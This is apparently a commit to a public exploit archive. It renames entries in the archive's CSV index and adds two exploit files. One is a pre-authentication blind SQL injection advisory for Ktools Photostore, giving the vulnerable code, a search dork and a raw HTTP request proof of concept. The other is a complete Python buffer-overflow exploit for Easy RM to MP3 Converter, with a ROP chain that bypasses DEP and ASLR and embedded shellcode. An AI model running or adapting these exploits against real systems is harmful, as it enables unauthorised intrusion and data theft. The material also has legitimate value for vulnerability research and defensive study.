DB: 2016-07-01

2 new exploits phpBookingCalendar <= 1.0c - (details_view.php) Remote SQL Injection TFT Gallery <= 0.10 - Password Disclosure Remote Exploit phpBookingCalendar 1.0c - (details_view.php) SQL Injection TFT Gallery 0.10 - Password Disclosure Remote Exploit Seattle Lab Mail 5.5 - POP3 Buffer Overflow Seattle Lab Mail (SLMail) 5.5 - POP3 Buffer Overflow Ktools Photostore 4.7.5 - Blind SQL Injection Easy RM to MP3 Converter 2.7.3.700 - (.m3u) Exploit with Universal DEP+ASLR Bypass
2016-07-01 05:05:35 +00:00 · 2016-07-01 05:05:35 +00:00 · 0fddce018e
commit 0fddce018e
parent f74a7dfb7e
3 changed files with 242 additions and 3 deletions
--- a/files.csv
+++ b/files.csv
@ -1349,8 +1349,8 @@ id,file,description,date,author,platform,type,port
 1607,platforms/windows/remote/1607.cpp,"Microsoft Internet Explorer (createTextRang) Download Shellcoded Exploit",2006-03-23,ATmaCA,windows,remote,0
 1608,platforms/php/webapps/1608.php,"WebAlbum <= 2.02pl - COOKIE[skin2] Remote Code Execution Exploit",2006-03-25,rgod,php,webapps,0
 1609,platforms/php/webapps/1609.pl,"PHP Ticket <= 0.71 (search.php) Remote SQL Injection Exploit",2006-03-25,undefined1_,php,webapps,0
-1610,platforms/php/webapps/1610.txt,"phpBookingCalendar <= 1.0c - (details_view.php) Remote SQL Injection",2006-03-25,undefined1_,php,webapps,0
+1610,platforms/php/webapps/1610.txt,"phpBookingCalendar 1.0c - (details_view.php) SQL Injection",2006-03-25,undefined1_,php,webapps,0
-1611,platforms/php/webapps/1611.pl,"TFT Gallery <= 0.10 - Password Disclosure Remote Exploit",2006-03-25,undefined1_,php,webapps,0
+1611,platforms/php/webapps/1611.pl,"TFT Gallery 0.10 - Password Disclosure Remote Exploit",2006-03-25,undefined1_,php,webapps,0
 1612,platforms/php/webapps/1612.php,"CuteNews <= 1.4.1 (function.php) Local File Include Exploit",2006-03-26,"Hamid Ebadi",php,webapps,0
 1613,platforms/windows/dos/1613.c,"Vavoom <= 1.19.1 - Multiple Vulnerabilities/Denial of Service Exploit",2006-03-26,"Luigi Auriemma",windows,dos,0
 1614,platforms/windows/dos/1614.c,"csDoom <= 0.7 - Multiple Vulnerabilities/Denial of Service Exploit",2006-03-26,"Luigi Auriemma",windows,dos,0
@ -14196,7 +14196,7 @@ id,file,description,date,author,platform,type,port
 16396,platforms/windows/remote/16396.rb,"Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection",2011-02-08,metasploit,windows,remote,0
 16397,platforms/windows/remote/16397.rb,"Lyris ListManager MSDE Weak sa Password",2010-09-20,metasploit,windows,remote,0
 16398,platforms/windows/remote/16398.rb,"Microsoft SQL Server Hello Overflow",2010-04-30,metasploit,windows,remote,0
-16399,platforms/windows/remote/16399.rb,"Seattle Lab Mail 5.5 - POP3 Buffer Overflow",2010-04-30,metasploit,windows,remote,0
+16399,platforms/windows/remote/16399.rb,"Seattle Lab Mail (SLMail) 5.5 - POP3 Buffer Overflow",2010-04-30,metasploit,windows,remote,0
 16400,platforms/windows/remote/16400.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow",2010-05-09,metasploit,windows,remote,0
 16401,platforms/windows/remote/16401.rb,"CA BrightStor ARCserve Message Engine Heap Overflow",2010-04-30,metasploit,windows,remote,0
 16402,platforms/windows/remote/16402.rb,"CA BrightStor HSM Buffer Overflow",2010-05-09,metasploit,windows,remote,0
@ -35864,6 +35864,7 @@ id,file,description,date,author,platform,type,port
 39652,platforms/multiple/dos/39652.txt,"Adobe Flash - Color.setTransform Use-After-Free",2016-04-01,"Google Security Research",multiple,dos,0
 39653,platforms/php/dos/39653.txt,"PHP 5.5.33 - Invalid Memory Write",2016-04-01,vah_13,php,dos,0
 39654,platforms/windows/dos/39654.pl,"Xion Audio Player <= 1.5 (build 160) - .mp3 Crash PoC",2016-04-04,"Charley Celice",windows,dos,0
 40046,platforms/php/webapps/40046.txt,"Ktools Photostore 4.7.5 - Blind SQL Injection",2016-06-30,"Gal Goldshtein and Viktor Minin",php,webapps,80
 39656,platforms/multiple/local/39656.py,"Hexchat IRC Client 2.11.0 - Directory Traversal",2016-04-04,PizzaHatHacker,multiple,local,0
 39657,platforms/multiple/dos/39657.py,"Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow",2016-04-04,PizzaHatHacker,multiple,dos,0
 39659,platforms/hardware/webapps/39659.txt,"PQI Air Pen Express 6W51-0000R2 / 6W51-0000R2XXX - Multiple Vulnerabilities",2016-04-04,Orwelllabs,hardware,webapps,0
@ -36121,6 +36122,7 @@ id,file,description,date,author,platform,type,port
 39930,platforms/osx/dos/39930.c,"OS X Kernel - Stack Buffer Overflow in GeForce GPU Driver",2016-06-10,"Google Security Research",osx,dos,0
 39931,platforms/php/webapps/39931.txt,"FRticket Ticket System - Stored XSS",2016-06-13,"Hamit Abis",php,webapps,80
 39932,platforms/php/webapps/39932.html,"Viart Shopping Cart 5.0 - CSRF Shell Upload",2016-06-13,"Ali Ghanbari",php,webapps,80
 39933,platforms/windows/local/39933.py,"Easy RM to MP3 Converter 2.7.3.700 - (.m3u) Exploit with Universal DEP+ASLR Bypass",2016-06-13,"Fitzl Csaba",windows,local,0
 39934,platforms/php/webapps/39934.txt,"Dream Gallery 2.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80
 39935,platforms/php/webapps/39935.txt,"Grid Gallery 1.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80
 39936,platforms/php/webapps/39936.txt,"Joomla PayPlans (com_payplans) Extension 3.3.6 - SQL Injection",2016-06-13,"Persian Hack Team",php,webapps,80
--- a/platforms/php/webapps/40046.txt
+++ b/platforms/php/webapps/40046.txt
@ -0,0 +1,45 @@
 Title       : Ktools Photostore <= 4.7.5 (Pre-Authentication) Blind SQL Injection
 CVE-ID      : CVE-2016-4337
 Google Dork: inurl:mgr.login.php
 Product     : Photostore
 Affected    : Versions prior to 4.7.5
 Impact      : Critical
 Remote      : Yes
 Website link: http://www.ktools.net
 Reported    : 02/06/2016
 Authors     : Gal Goldshtein and Viktor Minin
 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 No authentication (login) is required to exploit this vulnerability.
 The Photostore application password recovery module is prone to a blind sql injection attack.
 An attacker can exploit this vulnerability to retrieve all the data stored in the application's database.
 Vulnerable code is located in the mgr.login.php file:
 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 case 'recover_login': {
                                                mysqli_query( $db, '' . 'SELECT username,password,email,admin_id FROM ' . $dbinfo[pre] . 'admins where email = \'' . $_POST['email'] . '\'' );
                                                $result = ;
                                                mysqli_num_rows( $result );
                                                $returned_rows = ;
                                                mysqli_fetch_array( $result );
                                                $db_admin_user = ;
 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 PoC:
 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 POST /photostore/manager/mgr.login.php?pmode=recover_login HTTP/1.1
 Host: victim.net
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Referer: http://server/photostore/manager/mgr.login.php?username=demo&password=demo
 Cookie: member[umem_id]=58C05864CA6A59DBGHJSKDHGDGS770D5; PHPSESSID=30afayreighgfdgucb0d2b0c6dece3158
 Connection: keep-alive
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 9
 email=%27%20[SQL PAYLOAD];#
 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
--- a/platforms/windows/local/39933.py
+++ b/platforms/windows/local/39933.py
@ -0,0 +1,192 @@
 # Exploit Title: Easy RM to MP3 Converter 2.7.3.700 (.m3u) File BoF Exploit with Universal DEP+ASLR bypass
 # Date: 2016-06-12
 # Exploit Author: Csaba Fitzl
 # Vendor Homepage: N/A
 # Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe
 # Version: 2.7.3.700
 # Tested on: Windows 7 x64
 # CVE : CVE-2009-1330
 import struct
 def create_rop_chain():
 	# rop chain generated with mona.py - www.corelan.be
 	# added missing parts, and some optimisation by Csaba Fitzl
 	rop_gadgets = [
 	  #mov 1000 to EDX - Csaba
 	  0x41414141,  # Filler (compensate)
 	  0x41414141,  # Filler (compensate)
 	  0x41414141,  # Filler (compensate)
 	  0x10025a1c,  # XOR EDX,EDX # RETN 
 	  0x1002bc3d,  # MOV EAX,411 # RETN
 	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
 	  0x41414141,  # Filler (compensate)
 	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
 	  0x41414141,  # Filler (compensate)
 	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
 	  0x41414141,  # Filler (compensate)
 	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
 	  0x41414141,  # Filler (compensate)
 	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
 	  0x41414141,  # Filler (compensate)
 	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
 	  0x41414141,  # Filler (compensate)
 	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
 	  0x41414141,  # Filler (compensate)
 	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
 	  0x41414141,  # Filler (compensate)
 	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
 	  0x41414141,  # Filler (compensate)
 	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
 	  0x41414141,  # Filler (compensate)
 	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
 	  0x41414141,  # Filler (compensate)
 	  0x1002dc24,  # ADD EAX,80 # POP EBP # RETN
 	  0x41414141,  # Filler (compensate)
 	  0x1002dc41,  # ADD EAX,40 # POP EBP # RETN
 	  0x41414141,  # Filler (compensate)
 	  0x1001d2ac,  # ADD EAX,4 # RETN
 	  0x1001d2ac,  # ADD EAX,4 # RETN
 	  0x1001d2ac,  # ADD EAX,4 # RETN
 	  0x1001d2ac,  # ADD EAX,4 # RETN
 	  0x1001d2ac,  # ADD EAX,4 # RETN
 	  0x1001d2ac,  # ADD EAX,4 # RETN
 	  0x1001d2ac,  # ADD EAX,4 # RETN
 	  0x1001d2ac,  # ADD EAX,4 # RETN
 	  0x1001d2ac,  # ADD EAX,4 # RETN
 	  0x1001d2ac,  # ADD EAX,4 # RETN
 	  0x1001d2ac,  # ADD EAX,4 # RETN
 	  0x10023327,  # INC EAX # RETN
 	  0x10023327,  # INC EAX # RETN
 	  0x10023327,  # INC EAX # RETN
 	  # AT this point EAX = 0x1000
 	  0x1001a788,  # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll] 
 	  0x41414141,  # Filler (compensate)
 	  0x41414141,  # Filler (compensate)
 	  0x41414141,  # Filler (compensate)
 	  0x1001bf0d, #(RVA : 0x0001bf0d) : # ADC EDX,ESI
 	  0x41414141,  # Filler (compensate)
 	  0x10026d56,  # POP EAX # RETN [MSRMfilter03.dll] 
 	  0x10032078,  # ptr to &VirtualAlloc() [IAT MSRMfilter03.dll]
 	  0x1002e0c8,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSRMfilter03.dll]
 	  0x1001a788,  # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll] 
 	  0x41414141,  # Filler (compensate)
 	  0x41414141,  # Filler (compensate)
 	  0x41414141,  # Filler (compensate)
 	  0x10027c5a,  # POP EBP # RETN [MSRMfilter03.dll] 
 	  0x1001b058,  # & push esp # ret  [MSRMfilter03.dll]
 	  0x1002b93e,  # POP EAX # RETN [MSRMfilter03.dll] 
 	  0xfffffffb,  # put delta into eax (-> put 0x00000001 into ebx)
 	  0x1001d2ac,  # ADD EAX,4 # RETN
 	  0x10023327,  # INC EAX # RETN
 	  0x10023327,  # INC EAX # RETN
 	  0x1001bdee,  # PUSH EAX # MOV EAX,1 # POP EBX # ADD ESP,8 # RETN [MSRMfilter03.dll] 
 	  0x41414141,  # Filler (compensate)
 	  0x41414141,  # Filler (compensate)
 	  0x10029f74,  # POP ECX # RETN [MSRMfilter03.dll] 
 	  0xffffffff,  #  
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
 	  0x1002bc6a,  # POP EDI # RETN [MSRMfilter03.dll] 
 	  0x1001c121,  # RETN (ROP NOP) [MSRMfilter03.dll]
 	  0x10026f2b,  # POP EAX # RETN [MSRMfilter03.dll] 
 	  0x10024004, #address to xor, it will point to the DLL's data section which is writeable. Also will work as NOP
 	  0x1002bc07  # PUSHAD # XOR EAX,11005 # ADD BYTE PTR DS:[EAX],AL 
 	]
 	return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
 buffersize = 26090
 junk = "A" * buffersize
 eip = '\x85\x22\x01\x10' # {pivot 8 / 0x08} :  # ADD ESP,8 # RETN
 rop = create_rop_chain()
 calc = (
 "\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64"
 "\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B"
 "\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20"
 "\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07"
 "\x57\x69\x6E\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
 "\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7")
 shell = "\x90"*0x10 + calc
 exploit = junk + eip + rop + shell + 'C' * (1000-len(rop)-len(shell))
 filename = "list.m3u"
 textfile = open(filename , 'w')
 textfile.write(exploit)
 textfile.close()